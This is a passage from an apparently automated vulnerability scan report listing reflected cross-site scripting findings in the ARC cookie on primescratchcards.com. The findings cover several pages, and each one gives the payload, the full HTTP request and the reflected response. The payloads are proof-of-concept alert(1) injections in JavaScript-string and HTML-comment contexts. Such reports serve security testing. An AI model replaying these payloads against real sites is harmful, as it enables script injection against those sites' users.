Cookie: ARC=130137f5f1a"%3balert(1)//c43ea638988; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f5f1a%22%3Balert%281%29%2F%2Fc43ea638988; expires=Tue, 15-May-2012 12:38:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137f5f1a";alert(1)//c43ea638988' border='0' width='1' height='1'>
...[SNIP]...

3.129. http://primescratchcards.com/images/index.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/index.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload bdc95--><script>alert(1)</script>eea9fa94cc6 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bdc95--><script>alert(1)</script>eea9fa94cc6; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137bdc95%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeea9fa94cc6; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137bdc95--><script>alert(1)</script>eea9fa94cc6">
...[SNIP]...

3.130. http://primescratchcards.com/images/media.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59f27"%3balert(1)//e1dbe20273c was submitted in the ARC cookie. This input was echoed as 59f27";alert(1)//e1dbe20273c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013759f27"%3balert(1)//e1dbe20273c; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013759f27%22%3Balert%281%29%2F%2Fe1dbe20273c; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013759f27";alert(1)//e1dbe20273c' border='0' width='1' height='1'>
...[SNIP]...

3.131. http://primescratchcards.com/images/media.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/media.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload bb723--><script>alert(1)</script>b0a1c6492cb was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bb723--><script>alert(1)</script>b0a1c6492cb; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137bb723%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb0a1c6492cb; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137bb723--><script>alert(1)</script>b0a1c6492cb">
...[SNIP]...

3.132. http://primescratchcards.com/images/media.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 497bd'%3balert(1)//15e5732e970 was submitted in the ARC cookie. This input was echoed as 497bd';alert(1)//15e5732e970 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137497bd'%3balert(1)//15e5732e970; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137497bd%27%3Balert%281%29%2F%2F15e5732e970; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137497bd';alert(1)//15e5732e970&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.133. http://primescratchcards.com/images/playersclub.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4b23'%3balert(1)//32d80ef87e5 was submitted in the ARC cookie. This input was echoed as c4b23';alert(1)//32d80ef87e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c4b23'%3balert(1)//32d80ef87e5; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137c4b23%27%3Balert%281%29%2F%2F32d80ef87e5; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137c4b23';alert(1)//32d80ef87e5&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.134. http://primescratchcards.com/images/playersclub.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b793"%3balert(1)//1e0f1270bd7 was submitted in the ARC cookie. This input was echoed as 4b793";alert(1)//1e0f1270bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374b793"%3balert(1)//1e0f1270bd7; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301374b793%22%3Balert%281%29%2F%2F1e0f1270bd7; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301374b793";alert(1)//1e0f1270bd7' border='0' width='1' height='1'>
...[SNIP]...

3.135. http://primescratchcards.com/images/playersclub.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload adf59--><script>alert(1)</script>9a13a509d6a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137adf59--><script>alert(1)</script>9a13a509d6a; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137adf59%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9a13a509d6a; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137adf59--><script>alert(1)</script>9a13a509d6a">
...[SNIP]...

3.136. http://primescratchcards.com/images/promotions.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/promotions.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 634dd--><script>alert(1)</script>f4ababbc828 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137634dd--><script>alert(1)</script>f4ababbc828; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137634dd%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef4ababbc828; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137634dd--><script>alert(1)</script>f4ababbc828">
...[SNIP]...

3.137. http://primescratchcards.com/images/promotions.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f55e4'%3balert(1)//6af5e83356f was submitted in the ARC cookie. This input was echoed as f55e4';alert(1)//6af5e83356f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f55e4'%3balert(1)//6af5e83356f; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f55e4%27%3Balert%281%29%2F%2F6af5e83356f; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137f55e4';alert(1)//6af5e83356f&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.138. http://primescratchcards.com/images/promotions.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4a0"%3balert(1)//d5f5fbe1a5d was submitted in the ARC cookie. This input was echoed as 8e4a0";alert(1)//d5f5fbe1a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378e4a0"%3balert(1)//d5f5fbe1a5d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301378e4a0%22%3Balert%281%29%2F%2Fd5f5fbe1a5d; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301378e4a0";alert(1)//d5f5fbe1a5d' border='0' width='1' height='1'>
...[SNIP]...

3.139. http://primescratchcards.com/images/terms.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/terms.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 7745f--><script>alert(1)</script>d768002612a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377745f--><script>alert(1)</script>d768002612a; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301377745f%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed768002612a; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301377745f--><script>alert(1)</script>d768002612a">
...[SNIP]...

3.140. http://primescratchcards.com/images/terms.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d47"%3balert(1)//edab606af36 was submitted in the ARC cookie. This input was echoed as b7d47";alert(1)//edab606af36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b7d47"%3balert(1)//edab606af36; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137b7d47%22%3Balert%281%29%2F%2Fedab606af36; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137b7d47";alert(1)//edab606af36' border='0' width='1' height='1'>
...[SNIP]...

3.141. http://primescratchcards.com/images/terms.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 133fa'%3balert(1)//f7892ed5c0f was submitted in the ARC cookie. This input was echoed as 133fa';alert(1)//f7892ed5c0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137133fa'%3balert(1)//f7892ed5c0f; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137133fa%27%3Balert%281%29%2F%2Ff7892ed5c0f; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137133fa';alert(1)//f7892ed5c0f&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.142. http://primescratchcards.com/images/underage.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/underage.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload cb889--><script>alert(1)</script>7c8fb9ac580 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137cb889--><script>alert(1)</script>7c8fb9ac580; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137cb889%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7c8fb9ac580; expires=Tue, 15-May-2012 12:38:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

